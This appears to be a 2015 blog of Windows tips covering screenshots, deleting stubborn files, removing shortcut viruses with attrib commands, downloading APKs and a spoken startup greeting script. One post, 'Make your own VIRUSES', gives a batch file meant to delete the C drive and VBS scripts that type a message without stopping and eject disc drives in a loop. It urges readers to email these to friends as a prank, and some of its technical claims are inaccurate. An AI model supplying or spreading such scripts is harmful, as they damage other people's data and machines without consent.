Tuesday, 27 January 2015

How do I take a screenshot of your PC?With and Without any third party tool.

Taking screenshot of your desktop without any Third Party Tool

Well  taking picture of desktop is very simple.You just have to follow these simple steps:-
                                                                   
1. Go to the page or place which you want to take screenshot in your computer.
2. Then simply press the {{print Sc Sys Rq}} button on your keyboard.

3. By pressing this button your screenshot will be get copied to clipboard.
4. Then open paint and paste is there simply by pressing {{Ctrl + V}}
Tadda.......................You have successfully taken screenshot of your desktop or PC.


Taking screenshot of your desktop with a Third Party Tool

There are so many third party tool these days to take screenshot of running desktop. But I will suggest you to use the Snipping Tool because it is very easy to use and is very friendly with Windows. If you are using Windows7 then you don't need to download it just open Start and search for snipping tool. But if you are using Windows XP then you need to download externally by clicking here. It is only of 752 kb. So download it and enjoy it is a freeware for you.

Please like my facebook page
and feel free to post comment if you have any problem 


Read more ...

Saturday, 10 January 2015

How to delete Undeletable virus file ?

As we know that there is some virus files which are undeletable but today I will show you how to delete these kind of undeletable virus files



1] Open Notepad.exe
2] Click File>Save As..>
3] locate the folder where ur undeletable file is
4] Choose ‘All files’ from the file type box
5] click once on the file u wanna delete so its name appears in the ‘filename’ box
6] put a ” at the start and end of the filename (the filename should have the extension of the undeletable file so it will overwrite it)
7] Cick save,
It should ask u to overwrite the existing file,
choose yes and u can delete it as normal
Try it !!
Read more ...

Thursday, 8 January 2015

Make your own VIRUSES

                                       Making virus





Creating Virus That Format C Drive


In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat
3. Now, running this file format C Drive.

4. Please don't open this virus in your computer or your C drive will be formatted 



Make Your Keyboard Type (Any) Message Continuously-VBS Trick

This VBS trick can make any of your friend's keyboard type any message continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs. You will need to restart your computer to stop this. Try this after closing all important programs.

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop
Send this file to your friends as an email attachment to see the fun.

Create a Harmless Funny Virus with Notepad-Continuously eject CD/DVD drives

This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
 

 This is only for educational use

Be Careful


Read more ...

Monday, 5 January 2015

How to Remove shortcut virus from PC/Laptop/Pen drive – Solved!

This post is about Remove shortcut virus, In our PC/Laptop or in Pen drive we generally see one shortcut type folder which created automatically, many times when we use internet and downloading something then it might be that shortcut virus downloaded within your downloaded file and many times when we transfer the data from one computer to another computer and if one computer is affected from shortcut virus then surely other attached computer will also affected by shortcut virus in between data transfer, many times we insert our pen drive or any other external drive into other’s PC which are already affected by shortcut virus then our pen drive or external drive will be affected from shortcut virus.

 
I personally faced the shortcut virus problem in my PC, the shortcut virus damage the computer OS slowly, slowly, shortcut virus will create shortcut folder and file name same as original folder and file name and if you click on that shortcut virus files and folder then it will infect your PC poorly.

For the solution of the Shortcut Virus problem I am going to write some easiest way to remove shortcut virus from PC/Laptop/Pen drive and other external drives. There are lots of methods available to remove shortcut virus, including CMD, Registry entry, free software, Paid software, using .Dat file etc. Here I will explain the 2 most simplest way to remove shortcut virus from computer and from your USB 

1) How to Remove Shortcut virus using CMD

If you are suffering from the shortcut virus problem, then surely you tried to remove shortcut virus files manually, but files are not removed, they show some error messages, so for the solution of this error message simply follow the below step and remove shortcut virus from your PC.
Step 1) Open CMD (Command Prompt – DOS)
Step 2) Write the below command
attrib -h -s -r -a /s /d drive name:*.*
Simply replace the drive name with your actual drive letter, for example, if you want to remove shortcut virus from C drive, then type attrib -h -s -r -a /s /d c:*.*
Step 3) Hit enter button
Step 4) Now, after that all the shortcut virus files and folder will be normal files and folder form simply go and delete the shortcut virus files and folder

2) How to Remove Shortcut virus using a .bat file

Bat file is nothing but an executable file which can create in notepad and directly executed by double clicking on it, you can also do the above method, process using .bat file, I know you are thinking that why he writes same method twice, but guys you have noticed that if your all drives are infected from shortcut virus then you have to run above command separately for each and every drive, it takes your lots of important time so the solution of this problem I am writing the new method to remove shortcut virus.
Step 1) Open notepad file
Step 2) Copy and paste the below code into a notepad file
@echo off
attrib -h -s -r -a /s /d Name_Drive:*.*
attrib -h -s -r -a /s /d Name_Drive:*.*
attrib -h -s -r -a /s /d Name_Drive:*.*
@echo complete.
Step 3) simply replace the Name_Drive with your infected drive name, if you have more than 3 drive then simply copy and paste the command.
Step 4) Save the file with name removevirus.bat
Step 5) Now simply close the file and run it
Step 6) After that all of your Shortcut virus files and folder are in normal form, now go and remove the shortcut files and folders


I hope you like my article and methods to “Remove shortcut virus from computer/ Laptop/ Pendrive”, You can also use the above methods to Remove shortcut virus from external hard disk,  if you have any type of doubt or question then please let me know in below to comment so that I will try to remove your doubts and answer your questions 

 


 

 
Read more ...

Friday, 2 January 2015

How To Download APK Files In Android Device Directly From Play Store?

You must be knowing that downloading APK files directly from the play store is pain and officially it is not possible. However there is an app Apk Downloader Extension which has made it possible to download and store APK files to your device directly from the play store. This app actually do wonders and somehow manages to pull apks from the play store.
                                                             

Few Remarkable Features:

It gives freedom to download apps which are not available in your country
The Apps can be downloaded with an ease even if your device is not officially supported.
It can pull Apk from play store, even if it is not installed in your device.
The downloaded apks can also be used as a backup.
The app can bypass all the restrictions made by Google play services and therefore this particular app can be used by both type of android users who have play store either enabled  or disabled. So here is the process reviewed below.

 How To Download Apk Directly From Play Store ?

Apk Downloader Extension seems to work flawlessly with almost each app available in the play store. So if you want to download apps and store them as the Apk file then download this app from the play store firstly from here and follow the steps mentioned below to download apk of any app of your choice.
Go to Play Store and select any app which you want to download.
Tap the Share button from the top right corner of the screen just to the left of search icon.
Select 'Apk Downloader Extension' from the share options.
The package will be added automatically , Hit 'Get' to start the download.
The Apk will be downloaded automatically without the intervention of Google Play Services.
Tap the Apk file to install it.
You are done.
 Enjoy !!!!!!!!!!!!!!!!!

Read more ...

How To Find & Remove Viruses Using Command Prompt

Follow the below guide only if you think any of your drive is affected with virus or if you think there are some harmful files and you want to delete them.
                                                   


Step 1: Go to start menu and type “cmd” in the search box or Start>all programs>accessories>command prompt.

Step 2: Select the infected drive,to do so type in CMD , D: to go to D: drive.

Step 3: Now type dir/w/a . It will show all the files of the drive including hidden files.

Now Check if there is any file or virus that you are not aware of and you think might be Harmful to your PC.

Step 4: Usually there is Autorun.inf file which you must delete it. to do so Type in attrib -h -r -s autorun.inf  and press Enter. Type del autorun.inf  and press Enter. Follow this for all other drives.

Step 5: We have now Succesfully found and deleted autorun.inf file from D drive. if you find any .exe file which is unknown to you. then delete it using the same above method.


Best Of Luck



Read more ...

Make your Computer Welcome You

                                                        



Do you watch movies? Have you always loved the way how Computers in 

movies welcome their users by calling out their names? I bet that you too would 
want to know how you can achieve similar results on your PC and have a computer said welcome.

Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-


1.Click on Start. Navigate to All Programs, Accessories and Notepad.


2.Copy and paste the exact code given below.


Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks

 
     3.  Replace Username with your own name.


     4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
     5.  Copy the saved file.


     6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and toC:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.


     7.  Paste the file.



Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

Note: For best results, it is recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by following the steps given below:-
Go to Control Panel.
Then click on Switch to Classic View.
Then Click on Sounds and Audio Devices.
Then Click on the Sounds Tab.
Select No Sounds from the Sound Scheme option.
If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
Click on OK.


Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.
Read more ...